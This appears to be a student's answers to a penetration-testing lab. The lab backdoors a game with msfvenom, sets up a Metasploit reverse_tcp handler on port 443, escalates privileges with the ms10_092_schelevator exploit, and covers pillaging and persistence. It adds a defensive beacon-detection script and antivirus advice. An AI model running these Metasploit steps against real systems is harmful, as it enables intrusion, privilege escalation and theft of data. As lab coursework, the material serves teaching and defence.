Q2 - Based on what Nmap has found about the victim, how valuable would it be to do an
unauthenticated scan of the workstation IP with a vulnerability scanner such as
Nessus/NeXpose/OpenVAS? Explain your reasoning.
Not very valuable: nmap already gave us the running services and their versions, which is
enough to search for known vulnerabilities in them.
Q3 - What is the size (in bytes) of the backdoored game file? = 182784
What is the size (in bytes) of the original game file? = 118784
Q4 - Describe in a way that a company CEO could understand what the above msfvenom
command does.
It creates a payload that will allow an attacker to gain access to the system, appends that
payload to an .exe file (in this case a game), and then encrypts it to make it undetectable to
antivirus.
In addition, describe this in a way that a CEO could understand specifically what
“windows/meterpreter/reverse_tcp” is and what it does.
It's a payload that, if installed on a victim's machine, will try to send out connection probes to the
attacker's machine; it contains the IP address and port number needed to initialize the connection.
If the victim has a firewall with egress filtering, then important ports like 443 (HTTPS) will most
probably still be open.
What other ports would probably work just as well and why?
Ports 53, 22, etc.; most firewall egress filtering will allow these well-known ports.
Q6 - What is the difference between the reverse_tcp stager and the reverse_http stager?
In reverse_http, communication between the payload and Metasploit takes place over the HTTP protocol,
so it is less suspicious.
When you know the victim's machine is behind a firewall with egress filtering.
Q7 - Describe two other ways that might work to get our malware onto a user’s workstation other
than via email or web. Assume social engineering may be required.
Q8 - Privilege escalation: Using only the meterpreter shell, attempt to escalate your privileges to
an Administrator or SYSTEM. Show how you did this and proof that it worked.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.20.0.134
set LPORT 443
exploit
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
exploit
getuid
sysinfo
Q10 - Pillaging: Using only the meterpreter shell, search user directories for potentially sensitive
documents and images. Download them to the lab5-loot directory. Show the contents of the
Q11 - Persistence: Using only the meterpreter shell, install meterpreter as a service so that it
persistently tries to connect back to your Kali VM on port 443 every 60 seconds.
Prove that it works by rebooting the Windows workstation and setting up another multi/handler
on Kali to demonstrate that you are able to get another meterpreter shell when it restarts.
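The persistence step above has the implant retry its connection every 60 seconds, and the egress-filtering answers note that 443, 53 and 22 are usually allowed outbound. From the defender's side that regularity is the signal: a host opening a connection to the same external IP:port on a near-fixed period deserves an alert regardless of which port it uses. The following script is an added example, not part of the lab answers; the firewall log format and the sample lines (workstation 10.20.0.50, unrelated host 203.0.113.10) are constructed, and the Kali address 10.20.0.134 and port 443 are taken from the handler configuration above.

```python
"""Beacon detection over firewall egress logs (added example, constructed data)."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log format (hypothetical firewall export):
#   <ISO time> <ALLOW|DENY> <src> -> <dst>:<port>
# Denied attempts count too: an implant behind egress filtering keeps retrying,
# so the retry rhythm is visible whether or not the connection succeeds.
LINE_RE = re.compile(r"^(\S+) (ALLOW|DENY) (\S+) -> (\S+):(\d+)$")

# Constructed sample: one 60-second beacon to the handler plus normal browsing
# traffic and a malformed line that the parser must skip.
SAMPLE_LOG = """\
2024-03-01T10:00:00 ALLOW 10.20.0.50 -> 10.20.0.134:443
2024-03-01T10:00:12 ALLOW 10.20.0.50 -> 203.0.113.10:443
2024-03-01T10:01:00 ALLOW 10.20.0.50 -> 10.20.0.134:443
2024-03-01T10:01:45 ALLOW 10.20.0.50 -> 203.0.113.10:443
2024-03-01T10:02:01 ALLOW 10.20.0.50 -> 10.20.0.134:443
this line is garbage and should be ignored
2024-03-01T10:03:00 ALLOW 10.20.0.50 -> 10.20.0.134:443
2024-03-01T10:03:30 ALLOW 10.20.0.50 -> 203.0.113.10:443
2024-03-01T10:04:00 ALLOW 10.20.0.50 -> 10.20.0.134:443
2024-03-01T10:05:00 ALLOW 10.20.0.50 -> 10.20.0.134:443
"""


def parse(log_text):
    """Yield (timestamp, src, dst, port) for each well-formed line; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield datetime.fromisoformat(m.group(1)), m.group(3), m.group(4), int(m.group(5))


def find_beacons(log_text, min_events=4, max_jitter=0.2):
    """Group connections by (src, dst, port) and score how regular the gaps are.

    A flow is flagged when it has at least `min_events` connections and the
    standard deviation of the inter-connection gap is small relative to the
    mean gap (jitter = stdev / mean, at most `max_jitter`).
    Returns {(src, dst, port): {"count": n, "period_s": mean_gap, "jitter": j}}.
    """
    flows = defaultdict(list)
    for ts, src, dst, port in parse(log_text):
        flows[(src, dst, port)].append(ts)

    hits = {}
    for key, times in flows.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits[key] = {
                "count": len(times),
                "period_s": round(avg, 1),
                "jitter": round(jitter, 3),
            }
    return hits


if __name__ == "__main__":
    for (src, dst, port), info in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {src} -> {dst}:{port} "
              f"every ~{info['period_s']}s ({info['count']} events, jitter {info['jitter']})")
```

On the constructed sample this flags only the 10.20.0.50 -> 10.20.0.134:443 flow (six events, period 60 s); the three browsing connections to 203.0.113.10 fall below `min_events` and are ignored. In a real deployment the thresholds need tuning, since legitimate software (update checks, monitoring agents) also beacons on fixed intervals, so the output is a triage list rather than a verdict.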
Run up-to-date antivirus; in our case the Windows 7 machine didn't have a running antivirus. Even if
the URL check fails to detect the malicious file, you should have a second line of defence that detects
suspicious activity when the file is run, and that is done by the antivirus.